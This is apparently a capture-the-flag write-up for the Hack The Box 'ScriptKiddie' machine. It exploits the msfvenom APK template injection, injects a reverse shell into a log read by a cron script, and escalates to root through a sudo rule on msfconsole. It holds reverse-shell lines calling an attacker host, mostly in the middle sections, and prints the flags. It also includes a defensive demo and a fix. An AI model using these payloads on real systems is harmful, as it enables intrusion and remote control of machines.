Hack-The-Box-walkthrough[ScriptKiddie]

Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 06 Feb 2021
IP: 10.10.10.226


information gathering

First, run nmap as usual (all TCP ports, with version detection):

┌──(root💀kali)-[~/hackthebox/machine/ScriptKiddie]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.226
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Port 5000 Webapp

The site is a web front end for offensive tooling: a form that wraps msfvenom payload generation.

Generating any Windows or Linux payload through the form writes the result to /static/payloads/<name>.exe on the web server, from where it can be downloaded directly (the cron job seen later deletes generated files after five minutes, matching the "expires" field):

payload: windows/meterpreter/reverse_tcp
LHOST: 10.10.14.3
LPORT: 4444
template: None
download: 122f1def6a8b.exe
expires: 5 mins


http://10.10.10.226:5000/static/payloads/122f1def6a8b.exe

The form also accepts a template file for the chosen payload type.

APK is one of the allowed template types, and msfvenom's handling of APK templates has a known command injection (CVE-2020-7384) for which Metasploit ships an exploit module:

  • Rapid7 Metasploit Framework msfvenom APK Template Command Injection

Generate a malicious APK with that module; it will be uploaded as the template:

msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options

Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):

Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.apk yes The APK file name


Payload options (cmd/unix/reverse_netcat):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

DisablePayloadHandler: True (no handler will be created!)


Exploit target:

Id Name
-- ----
0 Automatic

Start a listener on the LPORT, then submit the generated APK as the template for any payload on the web form; the injected command runs during generation and we get a shell as kid:

┌──(root💀kali)-[~/hackthebox/machine/ScriptKiddie]
└─# nc -lvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.226.
Ncat: Connection from 10.10.10.226:56260.
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
whoami
kid
python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 3: python: not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
kid@scriptkiddie:~/html$ id
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
kid@scriptkiddie:~/html$ cd
cd
kid@scriptkiddie:~$ ls
ls
html logs snap user.txt
kid@scriptkiddie:~$ cat user.txt
cat user.txt
b8f1aa40582cab9d40ac5866fbb13ec1

That gives the user flag.

get root

There is a second user on the box, pwn.

With a shell as kid we find a script in /home/pwn that is executed as pwn (the pspy output below confirms commands running as UID 1001):

kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

Relevant pspy64 findings: root's cron job that expires generated payloads after five minutes, and commands running as UID 1001 (pwn). The nc/sh lines at 06:37:19 are a reverse shell to 10.10.16.117, which is not our address, so someone else is already abusing the same script:

2021/02/07 06:36:42 CMD: UID=0    PID=1      | /sbin/init maybe-ubiquity 
2021/02/07 06:37:19 CMD: UID=1001 PID=409118 | rm /tmp/f
2021/02/07 06:37:19 CMD: UID=1001 PID=409122 | nc 10.10.16.117 9000
2021/02/07 06:37:19 CMD: UID=1001 PID=409121 | /bin/sh -i
2021/02/07 06:37:19 CMD: UID=1001 PID=409120 | cat /tmp/f
2021/02/07 06:38:01 CMD: UID=0 PID=409123 | /usr/sbin/CRON -f
2021/02/07 06:38:01 CMD: UID=0 PID=409125 | find /home/kid/html/static/payloads/ -type f -mmin +5 -delete
2021/02/07 06:38:01 CMD: UID=0 PID=409124 | /bin/sh -c find /home/kid/html/static/payloads/ -type f -mmin +5 -delete

The script takes everything from the third space-separated field of each log line as `${ip}` and interpolates it, unquoted, into a `sh -c` string, so the log file is a command-injection sink for anyone who can write to it, and it lives under /home/kid/logs. Two leading spaces push our text into field 3; a leading `;` terminates the nmap command so the shell runs our reverse shell next; and a trailing `#` comments out the rest of the generated command line (the `.nmap` suffix, the second `${ip}` and the `2>&1 >/dev/null` redirection), so the line stays syntactically valid and our shell's output is not discarded:

;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1' #

Append it to the log from the kid shell (in /home/kid/logs):

echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1' #" >> hackers
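To make the injection concrete, here is an added example (not code from the box or from this write-up) that reproduces the scanlosers.sh pipeline against a constructed log file in a temporary directory, with nmap replaced by a stub that only records its arguments and the reverse shell replaced by `touch` on a marker file, and places a hardened loop next to it. The log line format, the benign entry and all paths are assumptions made for the demo.

```shell
#!/bin/sh
# Added example, not code from the ScriptKiddie box or the walkthrough author.
# Reproduces the scanlosers.sh pipeline against a constructed log to show why
# "<two spaces>;<command> #" gives execution as the script's owner, then shows
# a hardened loop that rejects it. nmap is stubbed so this runs offline; the
# reverse shell is replaced by 'touch' on a marker file. Paths are assumptions.

WORK=$(mktemp -d)
LOG="$WORK/hackers"        # stands in for /home/kid/logs/hackers
MARK="$WORK/pwned"         # created only if the injected command actually runs
mkdir -p "$WORK/recon"
trap 'rm -rf "$WORK"' EXIT

# Stub nmap: records its argument vector instead of scanning anything.
cat > "$WORK/nmap" <<'EOF'
#!/bin/sh
echo "nmap $*" >> "$(dirname "$0")/nmap.calls"
EOF
chmod +x "$WORK/nmap"
export PATH="$WORK:$PATH"

# Constructed log lines (assumed format). The script uses field 3 onwards as the
# target, so a benign entry is "<field1> <field2> <ip>" and the malicious entry
# uses two leading spaces to land the payload in field 3.
printf '%s\n' "2021-02-07 06:36:42 10.10.14.3" > "$LOG"
printf '%s\n' "  ;touch $MARK #" >> "$LOG"

# Faithful to scanlosers.sh: ${ip} is interpolated unquoted into a sh -c string.
# The loop is grouped so that 'wait' collects the backgrounded sh processes.
vulnerable_scan() {
  cd "$WORK" || return 1
  cat "$1" | cut -d' ' -f3- | sort -u | {
    while read ip; do
      sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
    done
    wait
  }
}

# Hardened version: accept only a dotted-quad IPv4 target and call nmap directly
# with quoted arguments, so shell metacharacters in the log are never parsed.
safe_scan() {
  cd "$WORK" || return 1
  cut -d' ' -f3- "$1" | sort -u | {
    while IFS= read -r ip; do
      if ! printf '%s\n' "$ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'; then
        echo "rejected log entry: $ip" >&2
        continue
      fi
      nmap --top-ports 10 -oN "recon/$ip.nmap" "$ip" >/dev/null 2>&1 &
    done
    wait
  }
}

# Returns 0 when the injected command created the marker file.
injection_succeeds() {
  rm -f "$MARK"
  vulnerable_scan "$LOG"
  [ -e "$MARK" ]
}

# Returns 0 when the hardened loop finished without running the injected command.
injection_blocked() {
  rm -f "$MARK"
  safe_scan "$LOG"
  [ ! -e "$MARK" ]
}

injection_succeeds && echo "vulnerable loop: injected command executed"
injection_blocked  && echo "hardened loop: injected entry rejected, nothing executed"
# In the vulnerable run the stub nmap only ever sees "--top-ports 10 -oN recon/":
# the ';' ended its invocation early and the rest of the line became our command.
```

The fix is two-fold: an allow-list on the value that reaches the command (a sorted, de-duplicated log line is still attacker input), and dropping `sh -c` in favour of a direct argument vector so there is no second round of shell parsing at all.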

The listener on port 443 receives a shell as pwn:

┌──(root💀kali)-[~]
└─# nc -lvp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.226.
Ncat: Connection from 10.10.10.226:57604.
bash: cannot set terminal process group (842): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ id
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
pwn@scriptkiddie:~$ whoami
whoami
pwn
pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

sudo lets pwn run msfconsole as root without a password. msfconsole hands any command it does not recognise to the system shell (the `[*] exec:` lines), so everything typed at the msf6 prompt runs as root, which is enough to read the flag:

pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
sudo /opt/metasploit-framework-6.0.9/msfconsole

[Metasploit ASCII-art banner]

       =[ metasploit v6.0.9-dev                          ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: To save all commands executed since start up to a file, use the makerc command

stty: 'standard input': Inappropriate ioctl for device
[the stty warning repeats after every prompt because the reverse shell has no tty; repeats trimmed]
msf6 > id
[*] exec: id

uid=0(root) gid=0(root) groups=0(root)
msf6 > whoami
[*] exec: whoami

root
msf6 > pwd
[*] exec: pwd

/home/pwn
msf6 > cd /root
msf6 > ls
[*] exec: ls

root.txt
snap
msf6 > cat root.txt
[*] exec: cat root.txt

f485b5d61b464bdd4fcb17809ad8fa8b

Summary of knowledge

  • Rapid7 Metasploit Framework msfvenom APK Template Command Injection
  • Lateral movement via command injection: unsanitised log input interpolated into `sh -c` by a script running as another user
  • Root via a sudo NOPASSWD rule on msfconsole, which executes arbitrary shell commands

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…